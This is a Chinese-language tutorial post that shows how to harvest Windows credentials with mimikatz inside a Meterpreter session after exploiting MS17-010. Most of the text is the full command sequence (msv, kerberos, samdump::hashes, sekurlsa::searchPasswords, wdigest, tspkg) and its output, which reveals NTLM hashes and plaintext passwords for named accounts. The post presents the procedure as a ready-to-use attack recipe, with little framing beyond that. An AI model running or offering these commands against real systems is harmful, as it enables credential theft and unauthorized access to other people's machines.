kali meterpreter中mimikatz模块获取密码

喜你入骨 提交于 2020-04-03 18:00:08

kali这方面不说了, meterpreter也略过, 做个关于mimikatz的笔记.

mimikatz模块, 能获取对方机器的密码(包括哈希和明文).

 渗透模块怎么进的也不说了, 方式太多, 我用的是ms17-010

 

进去meterpreter后getuid一下(其他这个也没多大用处,军哥说进入meterpreter模式下 大部分情况下是拥有 system权限,无需 get system,但可能有些 权限管理严的 不一样)

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

这获得系统管理员权限

加载mimikatz模块

meterpreter > load mimikatz 
Loading extension mimikatz...Success.

加载成功.

获取登录密码的hash值

meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;334101  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;334068  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)
0;49101   NTLM                                    n.s. (Credentials KO)
0;999     NTLM       WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)

上面已经是得到hash值了. 下面算明文密码.

获取明文密码

meterpreter > kerberos 
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$   
0;49101   NTLM                                    
0;999     NTLM       WORKGROUP     CHENGLEE-PC$   
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

look...拿到登录的明文密码了.

不过也有一些特殊的情况, 例如这样

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID      Package    Domain        User           Password
------      -------    ------        ----           --------
0;10408969  NTLM       CLOUDVM       Administrator
0;266228    NTLM       CLOUDVM       Administrator
0;997       Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996       Negotiate  WORKGROUP     CLOUDVM$
0;23595     NTLM
0;999       NTLM       WORKGROUP     CLOUDVM$

噢, 这是什么鬼儿...哈希值也获取不到,

没事, 下一步继续,

使用另一种方式获取哈希值

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : chenglee-PC
BootKey    : 0648ced51b6060bed1a3654e0ee0fd93

Rid  : 500
User : Administrator
LM   : 
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

Rid  : 501
User : Guest
LM   : 
NTLM : 

Rid  : 1000
User : chenglee
LM   : 
NTLM : 8d0f8e1a18236379538411a9056799f5

ok, 获取到了, 

根据上面的方式获取明文密码

meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { chenglee ; chenglee-PC ; lizhenghua }
[1] { chenglee ; chenglee-PC ; lizhenghua }
[2] { chenglee ; chenglee-PC ; lizhenghua }
[3] { chenglee ; chenglee-PC ; lizhenghua }
[4] { chenglee-PC ; chenglee ; lizhenghua }
[5] { chenglee-PC ; chenglee ; lizhenghua }
meterpreter >

2

meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; CLOUDVM ; 1244567 }
[1] { Administrator ; CLOUDVM ; 1244567 }

都拿到了

另外提一下更简洁的方式,就是 wdigest命令了,

这个命令呢, 没有上面的复杂,加载模块后直接调用这个wdigest.

meterpreter > wdigest 
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$   
0;49101   NTLM                                    
0;999     NTLM       WORKGROUP     CHENGLEE-PC$   
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

还有一个跟wdigest一样牛的就是tspkg啦

meterpreter > tspkg 
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$   
0;49101   NTLM                                    
0;999     NTLM       WORKGROUP     CHENGLEE-PC$   
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

简直就是一击毙命有木有...

 

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!